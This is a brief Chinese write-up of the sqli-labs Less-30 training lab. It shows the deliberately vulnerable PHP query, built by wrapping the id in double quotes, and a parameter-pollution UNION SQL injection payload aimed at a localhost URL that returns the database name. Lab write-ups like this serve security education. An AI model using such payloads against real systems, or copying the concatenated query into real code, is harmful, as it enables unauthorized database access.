Sqli-labs Less-30 HPP参数污染攻击

Less-30与less-29原理是一致的，区别仅仅是将id的'变为了"，我们可以看到less-30的sql语句为：

$id=$_GET['id'];
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

所以payload为：

http://127.0.0.1/sql/Less-30/login.php?id=1&id=-1" union select 1,database(),3--+